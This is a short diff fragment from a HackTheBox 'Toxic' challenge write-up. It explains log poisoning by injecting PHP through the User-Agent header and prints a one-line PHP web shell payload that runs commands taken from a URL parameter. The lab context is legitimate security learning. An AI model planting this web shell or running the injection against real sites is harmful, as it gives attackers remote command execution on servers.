Jokepp/writeups/hackthebox/challenges/toxic.md

    <img src="includes/toxic-02.png" />
 </p>

 Now we need a way of injecting our PHP code into the log file.
 Since we can see that the log file contains the `User-Agent` string of all received HTTP requests, we decide to use this field for the injection.
-As payload we choose the following line:
+As payload we choose the following line[^7]:

 ``` php
 <?php echo shell_exec($_GET['cmd']); ?>